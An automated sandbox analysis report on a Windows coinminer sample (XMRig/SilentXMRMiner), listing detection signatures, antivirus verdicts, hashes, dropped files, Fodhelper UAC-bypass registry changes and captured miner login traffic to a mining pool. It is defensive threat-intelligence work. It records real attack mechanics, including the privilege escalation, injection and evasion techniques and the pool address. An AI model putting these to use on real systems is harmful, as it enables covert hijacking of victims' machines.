Windows Analysis Report
e7WMhx18XN.exe

Overview

General Information

Sample name: e7WMhx18XN.exe
renamed because original name is a hash value
Original sample name: 38be83afea1e906c05e5b851253cbc6a.exe
Analysis ID: 1528504
MD5: 38be83afea1e906c05e5b851253cbc6a
SHA1: 85841044836479ac3c0b9fb7f1f28928621a4a99
SHA256: 425ddd3f45aa02d04a06cf03129d403fe209fcc1a2a40f4cffa5e6042d1529c3
Tags: 32CoinMinerexe

Detection

SilentXMRMiner, Xmrig
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Xmrig
UAC bypass detected (Fodhelper)
Yara detected SilentXMRMiner
Yara detected Xmrig cryptocurrency miner
.NET source code contains process injector
.NET source code references suspicious native API functions
AI detected suspicious sample
Allocates memory in foreign processes
Changes security center settings (notifications, updates, antivirus, firewall)
Connects to many ports of the same IP (likely port scanning)
Contains functionality to compare user and computer (likely to detect sandboxes)
Contains functionality to inject code into remote processes
Creates a thread in another existing process (thread injection)
Creates an autostart registry key pointing to binary in C:\Windows
Creates autostart registry keys with suspicious names
Creates autostart registry keys with suspicious values (likely registry only malware)
Detected Stratum mining protocol
Found direct / indirect Syscall (likely to bypass EDR)
Found strings related to Crypto-Mining
Found suspicious powershell code related to unpacking or dynamic code loading
Hides that the sample has been downloaded from the Internet (zone.identifier)
Hooks files or directories query functions (used to hide files and directories)
Hooks processes query functions (used to hide processes)
Hooks registry keys query functions (used to hide registry keys)
Injects a PE file into a foreign processes
Injects code into the Windows Explorer (explorer.exe)
Installs a global keyboard hook
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Obfuscated command line found
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample is not signed and drops a device driver
Sets debug register (to hijack the execution of another thread)
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Bypass UAC via Fodhelper.exe
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential WinAPI Calls Via CommandLine
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Powerup Write Hijack DLL
Suspicious command line found
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates driver files
Creates files inside the system directory
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after accessing registry keys)
Found evasive API chain checking for process token information
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Suspicious Powershell In Registry Run Keys
Sigma detected: Suspicious Schtasks From Env Var Folder
Stores large binary data to the registry
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

Name: xmrig
Description: According to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling". In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.
Attribution: No Attribution
Blogpost URLs: (none)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig

AV Detection

Source: e7WMhx18XN.exe Avira: detected
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe Avira: detection malicious, Label: HEUR/AGEN.1344832
Source: C:\Users\user\AppData\Local\Temp\services64.exe Avira: detection malicious, Label: HEUR/AGEN.1344202
Source: C:\Users\user\AppData\Local\Temp\paint.exe Avira: detection malicious, Label: HEUR/AGEN.1344202
Source: e7WMhx18XN.exe ReversingLabs: Detection: 52%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\services64.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\paint.exe Joe Sandbox ML: detected
Source: e7WMhx18XN.exe Joe Sandbox ML: detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 56_2_00401000 CryptAcquireContextW,CryptGenRandom,CryptReleaseContext, 56_2_00401000

Privilege Escalation

Source: C:\Users\user\AppData\Local\Temp\FodhelperBypassUAC.exe Registry value created: NULL cmd.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FodhelperBypassUAC.exe Registry value created: DelegateExecute Jump to behavior

Bitcoin Miner

Source: Yara match File source: Process Memory Space: conhost.exe PID: 7536, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: conhost.exe PID: 6140, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: 0000001D.00000003.1512941310.0000012BFEB19000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000003.1503362780.0000012BFEB14000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000003.1516296200.0000012BFEB11000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000003.1491167267.0000012BFEB12000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000003.1504370851.0000012BFEB1A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000003.1510372978.0000012BFEB11000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000003.1485004069.0000012BFEB18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000003.1493388447.0000012BFEB1C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000003.1515362432.0000012BFEB10000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000003.1500353828.0000012BFEB1F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000003.1490294728.0000012BFEB18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000003.1489451873.0000012BFEB13000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000003.1492275711.0000012BFEB1C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000003.1480698288.0000012BFEB1A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000003.1514543598.0000012BFEB11000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000003.1483759497.0000012BFEB1A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000003.1507696835.0000012BFEB1D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000003.1473812913.0000012BFEB13000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000003.1501988421.0000012BFEB12000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000003.1482207840.0000012BFEB14000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000003.1508918553.0000012BFEB16000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000003.1517174227.0000012BFEB1C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000003.1506306957.0000012BFEB16000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000003.1464746998.0000012BFEB10000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: conhost.exe PID: 7536, type: MEMORYSTR
Source: global traffic TCP traffic: 192.168.2.10:54464 -> 45.76.89.70:80 payload: data raw: 7b 22 69 64 22 3a 31 2c 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6c 6f 67 69 6e 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 6c 6f 67 69 6e 22 3a 22 34 32 36 52 4e 78 53 53 45 71 63 50 75 76 34 68 77 45 48 6b 4a 66 37 6b 56 48 46 57 73 38 62 70 72 51 4a 70 4d 50 78 44 63 52 78 36 52 54 51 78 5a 57 37 72 42 79 69 58 55 34 43 6e 4d 44 71 72 48 4c 34 73 37 56 45 70 4d 47 38 51 6a 37 37 79 67 64 44 52 76 6b 42 55 33 4e 63 64 31 57 78 22 2c 22 70 61 73 73 22 3a 22 22 2c 22 61 67 65 6e 74 22 3a 22 58 4d 52 69 67 2f 36 2e 31 35 2e 32 20 28 57 69 6e 64 6f 77 73 20 4e 54 20 31 30 2e 30 3b 20 57 69 6e 36 34 3b 20 78 36 34 29 20 6c 69 62 75 76 2f 31 2e 33 38 2e 30 20 6d 73 76 63 2f 32 30 31 39 22 2c 22 72 69 67 69 64 22 3a 22 22 2c 22 61 6c 67 6f 22 3a 5b 22 72 78 2f 30 22 2c 22 63 6e 2f 32 22 2c 22 63 6e 2f 72 22 2c 22 63 6e 2f 66 61 73 74 22 2c 22 63 6e 2f 68 61 6c 66 22 2c 22 63 6e 2f 78 61 6f 22 2c 22 63 6e 2f 72 74 6f 22 2c 22 63 6e 2f 72 77 7a 22 2c 22 63 6e 2f 7a 6c 73 22 2c 22 63 6e 2f 64 6f 75 62 6c 65 22 2c 22 63 6e 2f 63 63 78 22 2c 22 63 6e 2d 6c 69 74 65 2f 31 22 2c 22 63 6e 2d 68 65 61 76 79 2f 30 22 2c 22 63 6e 2d 68 65 61 76 79 2f 74 75 62 65 22 2c 22 63 6e 2d 68 65 61 76 79 2f 78 68 76 22 2c 22 63 6e 2d 70 69 63 6f 22 2c 22 63 6e 2d 70 69 63 6f 2f 74 6c 6f 22 2c 22 63 6e 2f 75 70 78 32 22 2c 22 63 6e 2f 31 22 2c 22 72 78 2f 77 6f 77 22 2c 22 72 78 2f 61 72 71 22 2c 22 72 78 2f 67 72 61 66 74 22 2c 22 72 78 2f 73 66 78 22 2c 22 72 78 2f 6b 65 76 61 22 2c 22 61 72 67 6f 6e 32 2f 63 68 75 6b 77 61 22 2c 22 61 72 67 6f 6e 32 2f 63 68 75 6b 77 61 76 32 22 2c 22 61 72 67 6f 6e 32 2f 6e 69 6e 6a 61 22 2c 22 61 73 74 72 6f 62 77 74 22 5d 7d 7d 0a data ascii: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"426rnxsseqcpuv4hwehkjf7kvhfws8bprqjpmpxdcrx6rtqxzw7rbyixu4cnmdqrhl4s7vepmg8qj77ygddrvkbu3ncd1wx","pass":"","agent":"xmrig/6.15.2 (windows nt 10.0; win64; x64) libuv/1.38.0 msvc/2019","rigid":"","algo":["rx/0","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/upx2","cn/1","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","argon2/chukwa","argon2/chukwav2","argon2/ninja","astrobwt"]}}
Source: conhost.exe, 0000001D.00000003.1512941310.0000012BFEB19000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: stratum+tcp://
Source: conhost.exe, 0000001D.00000003.1512941310.0000012BFEB19000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: cryptonight/0
Source: conhost.exe, 0000001D.00000003.1512941310.0000012BFEB19000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: -o, --url=URL URL of mining server
Source: conhost.exe, 0000001D.00000003.1512941310.0000012BFEB19000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Usage: xmrig [OPTIONS]
Source: e7WMhx18XN.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: e7WMhx18XN.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\FodhelperBypassUAC.pdb source: e7WMhx18XN.exe, 00000001.00000002.1346529843.000000001C470000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\FodhelperBypassUAC.pdb source: e7WMhx18XN.exe, 00000001.00000002.1329521991.0000000003261000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:\Users\miles\Downloads\FodhelperBypassUAC-master\x64\Release\FodhelperBypassUAC.pdb source: e7WMhx18XN.exe, 00000001.00000002.1329806773.0000000013396000.00000004.00000800.00020000.00000000.sdmp, e7WMhx18XN.exe, 00000001.00000002.1329806773.0000000013274000.00000004.00000800.00020000.00000000.sdmp, e7WMhx18XN.exe, 00000001.00000002.1329521991.0000000003261000.00000004.00000800.00020000.00000000.sdmp, e7WMhx18XN.exe, 00000001.00000002.1329806773.0000000013305000.00000004.00000800.00020000.00000000.sdmp, FodhelperBypassUAC.exe, 0000000C.00000000.1323844842.00007FF6CF672000.00000002.00000001.01000000.00000008.sdmp, FodhelperBypassUAC.exe, 0000000C.00000002.1375088798.00007FF6CF672000.00000002.00000001.01000000.00000008.sdmp
Source: Binary string: /ERRORREPORT:PROMPT /OUT:C:\Users\miles\Downloads\FodhelperBypassUAC-master\x64\Release\FodhelperBypassUAC.exe /INCREMENTAL:NO /NOLOGO /MANIFEST "/MANIFESTUAC:level='asInvoker' uiAccess='false'" /manifest:embed /DEBUG /PDB:C:\Users\miles\Downloads\FodhelperBypassUAC-master\x64\Release\FodhelperBypassUAC.pdb /SUBSYSTEM:CONSOLE /OPT:REF /OPT:ICF /LTCG:incremental /LTCGOUT:x64\Release\FodhelperBypassUAC.iobj /TLBID:1 /DYNAMICBASE /NXCOMPAT /IMPLIB:C:\Users\miles\Downloads\FodhelperBypassUAC-master\x64\Release\FodhelperBypassUAC.lib /MACHINE:X64 source: e7WMhx18XN.exe, 00000001.00000002.1329806773.0000000013396000.00000004.00000800.00020000.00000000.sdmp, e7WMhx18XN.exe, 00000001.00000002.1329806773.0000000013274000.00000004.00000800.00020000.00000000.sdmp, e7WMhx18XN.exe, 00000001.00000002.1329806773.0000000013305000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: cwdC:\Users\miles\Downloads\FodhelperBypassUAC-master\FodhelperBypassUACexeC:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.41.34120\bin\HostX64\x64\link.exepdbC:\Users\miles\Downloads\FodhelperBypassUAC-master\x64\Release\FodhelperBypassUAC.pdbcmd /ERRORREPORT:PROMPT /OUT:C:\Users\miles\Downloads\FodhelperBypassUAC-master\x64\Release\FodhelperBypassUAC.exe /INCREMENTAL:NO /NOLOGO /MANIFEST "/MANIFESTUAC:level='asInvoker' uiAccess='false'" /manifest:embed /DEBUG /PDB:C:\Users\miles\Downloads\FodhelperBypassUAC-master\x64\Release\FodhelperBypassUAC.pdb /SUBSYSTEM:CONSOLE /OPT:REF /OPT:ICF /LTCG:incremental /LTCGOUT:x64\Release\FodhelperBypassUAC.iobj /TLBID:1 /DYNAMICBASE /NXCOMPAT /IMPLIB:C:\Users\miles\Downloads\FodhelperBypassUAC-master\x64\Release\FodhelperBypassUAC.lib /MACHINE:X64 source: e7WMhx18XN.exe, 00000001.00000002.1329806773.0000000013396000.00000004.00000800.00020000.00000000.sdmp, e7WMhx18XN.exe, 00000001.00000002.1329806773.0000000013274000.00000004.00000800.00020000.00000000.sdmp, e7WMhx18XN.exe, 00000001.00000002.1329806773.0000000013305000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: AC.pdb source: e7WMhx18XN.exe, 00000001.00000002.1329521991.0000000003261000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\src\vctools\crt\vcstartup\src\misc\amd64\guard_dispatch.asmD:\a\_work\1\s\src\vctools\crt\vcstartup\src\misc\amd64\guard_xfg_dispatch.asmD:\a\_work\1\s\src\vctools\crt\vcstartup\src\gs\amd64\amdsecgs.asmC:\Users\miles\Downloads\FodhelperBypassUAC-master\x64\Release\FodhelperBypassUAC.pdb source: e7WMhx18XN.exe, 00000001.00000002.1329806773.0000000013396000.00000004.00000800.00020000.00000000.sdmp, e7WMhx18XN.exe, 00000001.00000002.1329806773.0000000013274000.00000004.00000800.00020000.00000000.sdmp, e7WMhx18XN.exe, 00000001.00000002.1329806773.0000000013305000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:\Users\miles\Downloads\FodhelperBypassUAC-master\FodhelperBypassUAC\x64\Release\vc143.pdb source: e7WMhx18XN.exe, 00000001.00000002.1329806773.0000000013396000.00000004.00000800.00020000.00000000.sdmp, e7WMhx18XN.exe, 00000001.00000002.1329806773.0000000013274000.00000004.00000800.00020000.00000000.sdmp, e7WMhx18XN.exe, 00000001.00000002.1329806773.0000000013305000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: FodhelperBypassUAC.pdb source: e7WMhx18XN.exe, 00000001.00000002.1329521991.0000000003261000.00000004.00000800.00020000.00000000.sdmp

Networking

Source: global traffic TCP traffic: 147.185.221.22 ports 2,4,5,7,54872,8
Source: global traffic TCP traffic: 192.168.2.10:54593 -> 147.185.221.22:54872
Source: Joe Sandbox View IP Address: 45.76.89.70
Source: Joe Sandbox View IP Address: 147.185.221.22
Source: Joe Sandbox View ASN Name: AS-CHOOPAUS
Source: Joe Sandbox View ASN Name: SALSGIVERUS
Source: Network traffic Suricata IDS: 2036289 - Severity 2 - ET COINMINER CoinMiner Domain in DNS Lookup (pool .hashvault .pro) : 192.168.2.10:58455 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2826930 - Severity 2 - ETPRO COINMINER XMR CoinMiner Usage : 192.168.2.10:54464 -> 45.76.89.70:80
Source: unknown TCP traffic detected without corresponding DNS query: 147.185.221.22
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic DNS traffic detected: DNS query: pool.hashvault.pro
Source: lsass.exe, 00000067.00000000.2228427143.00000161C6489000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
Source: lsass.exe, 00000067.00000000.2228427143.00000161C6489000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0:
Source: lsass.exe, 00000067.00000000.2228427143.00000161C6489000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ocsp.msocsp.com0
Source: powershell.exe, 00000042.00000002.2281986100.000001DE9969C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000038.00000002.1931071513.0000000002DC1000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000003D.00000002.1992736988.0000000003357000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000041.00000002.1997379038.0000000003807000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://schemas.microsoft
Source: powershell.exe, 00000038.00000002.1931658908.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://schemas.microsoft6#ZQ
Source: conhost.exe, 00000014.00000002.1399936831.00000113DCE61000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000039.00000002.2283061146.0000022F420B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000040.00000002.2287502418.0000019C5BE51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000042.00000002.2281986100.000001DE99471000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000042.00000002.2281986100.000001DE9969C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: svchost.exe, 00000000.00000002.1367337795.0000010D91A13000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.bingmapsportal.com
Source: powershell.exe, 00000039.00000002.2283061146.0000022F420B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000040.00000002.2287502418.0000019C5BE51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000042.00000002.2281986100.000001DE99471000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: svchost.exe, 00000000.00000003.1365846529.0000010D91A58000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
Source: svchost.exe, 00000000.00000002.1367814340.0000010D91A62000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1365478065.0000010D91A61000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.ditu.live.com/REST/V1/MapControlConfiguration/native/
Source: svchost.exe, 00000000.00000003.1365285438.0000010D91A6E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1367511378.0000010D91A42000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1367901976.0000010D91A70000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1366308274.0000010D91A65000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1365478065.0000010D91A61000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1366072429.0000010D91A41000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1365846529.0000010D91A58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1365970028.0000010D91A59000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
Source: svchost.exe, 00000000.00000003.1365285438.0000010D91A6E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1367901976.0000010D91A70000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/
Source: svchost.exe, 00000000.00000003.1365846529.0000010D91A58000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
Source: svchost.exe, 00000000.00000003.1365415952.0000010D91A67000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1367850519.0000010D91A68000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
Source: svchost.exe, 00000000.00000003.1365285438.0000010D91A6E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1367901976.0000010D91A70000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.ditu.live.com/REST/v1/Transit/Stops/
Source: svchost.exe, 00000000.00000003.1365846529.0000010D91A58000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
Source: svchost.exe, 00000000.00000003.1366308274.0000010D91A65000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1367386845.0000010D91A2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1365478065.0000010D91A61000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1365846529.0000010D91A58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1365970028.0000010D91A59000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.virtualearth.net/REST/v1/Imagery/Copyright/
Source: svchost.exe, 00000000.00000003.1365846529.0000010D91A58000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
Source: svchost.exe, 00000000.00000003.1365415952.0000010D91A67000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1367850519.0000010D91A68000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1367386845.0000010D91A2B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
Source: svchost.exe, 00000000.00000003.1365846529.0000010D91A58000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
Source: svchost.exe, 00000000.00000003.1365846529.0000010D91A58000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
Source: svchost.exe, 00000000.00000003.1365846529.0000010D91A58000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
Source: svchost.exe, 00000000.00000003.1366308274.0000010D91A65000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1367386845.0000010D91A2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1365478065.0000010D91A61000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.virtualearth.net/REST/v1/Traffic/Incidents/
Source: svchost.exe, 00000000.00000002.1367511378.0000010D91A42000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1366072429.0000010D91A41000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
Source: svchost.exe, 00000000.00000003.1365846529.0000010D91A58000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
Source: svchost.exe, 00000000.00000002.1367814340.0000010D91A62000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1365478065.0000010D91A61000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
Source: svchost.exe, 00000000.00000002.1367511378.0000010D91A42000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1366072429.0000010D91A41000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&
Source: svchost.exe, 00000000.00000003.1365253867.0000010D91A50000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
Source: svchost.exe, 00000000.00000003.1366072429.0000010D91A41000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
Source: svchost.exe, 00000000.00000002.1367814340.0000010D91A62000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1365478065.0000010D91A61000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
Source: svchost.exe, 00000000.00000002.1367511378.0000010D91A42000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000003.1366072429.0000010D91A41000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gri?pv=1&r=
Source: svchost.exe, 00000000.00000003.1365253867.0000010D91A50000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dynamic.t
Source: svchost.exe, 00000000.00000003.1365846529.0000010D91A58000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
Source: svchost.exe, 00000000.00000003.1263372120.0000010D91A36000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ecn.dev.virtualearth.net/REST/V1/MapControlConfiguration/native/
Source: svchost.exe, 00000000.00000003.1365415952.0000010D91A67000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1367850519.0000010D91A68000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000000.00000002.1367386845.0000010D91A2B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
Source: powershell.exe, 00000042.00000002.2281986100.000001DE9969C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: svchost.exe, 00000000.00000003.1366072429.0000010D91A41000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
